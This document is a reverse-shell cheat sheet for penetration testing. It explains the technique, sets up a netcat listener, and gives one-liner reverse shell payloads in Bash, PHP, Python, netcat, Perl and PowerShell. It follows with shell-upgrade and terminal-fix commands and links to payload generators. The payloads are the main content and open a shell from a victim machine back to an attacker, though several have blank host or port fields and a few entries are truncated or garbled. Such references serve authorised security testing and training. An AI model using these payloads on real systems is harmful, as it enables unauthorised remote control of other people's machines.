A reverse shell is a shell session established on a connection that is initiated from a remote machine (victim). Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the victim machine and continue their attack. In other words, it is a technique used by attackers to gain access to a target machine by opening up a network connection between the attacker’s machine and the victim machine. Once the connection is established, the attacker can execute commands on the target machine as if they were sitting in front of it.

Create listener

Creation of listener with netcat:

$nc -lvnp 4444

-l ⇒ Listen mode, to wait for a connection to connect to us.
-v ⇒ Verbose mode, so that we know when we receive a connection.
-n ⇒ Disable DNS resolution and only connect from/to IPs, to speed up the connection.
-p ⇒ Port number netcatis listening on, and the reverse connection should be sent to.

Reverse Shell Payloads

Note

The NC v2 type is creating files in the /tmp directory. This method might detected by defensive products like AV/EDR.

Type	Payload
Bash	bash -i >& /dev/tcp// 0>&1
PHP	php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");'
Python	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
NC v1	nc -e /bin/sh
NC v2	rm /tmp/f;mkfifo /tmp/f;cat /tmp/f
Perl	perl -e 'use Socket;$i="<IP>";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PowerShell	powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("$ip",$port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535

Upgrading Shell

When you have a shell, always try to upgrade your reverse shell to get more commands and parameters at your disposal. Below a list of possible reverse shell upgrades.

Type	Payload
Python 2	python -c 'import pty; pty.spawn("/bin/bash")'
Python 3	python3 -c 'import pty; pty.spawn("/bin/bash")'
Bash	echo os.system("/bin/bash")
Perl	perl -e 'exec "/bin/bash";'

Shell fixes

When your shell is broken, or t is not showing the right formatting on your screen or what-so-ever. You can try fix your shell with these commands below.

Type	Fix
Fix Output	stty raw -echo
Get Window Size	stty size
Fix Window Size	stty rows X cols Y

References

Reverse Shell Generator

With this tool various reverse shell payloads can be generated:

Online - Reverse Shell Generator

pentestmonkey

Another great source is a PHP reverse shell from Pentestmonkey, see link below.

pentestmonkey - Overview

Payload All The Things

Reverse Shell cheatsheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

Pentest.ws

An overview of several reverse shells: pentest.ws: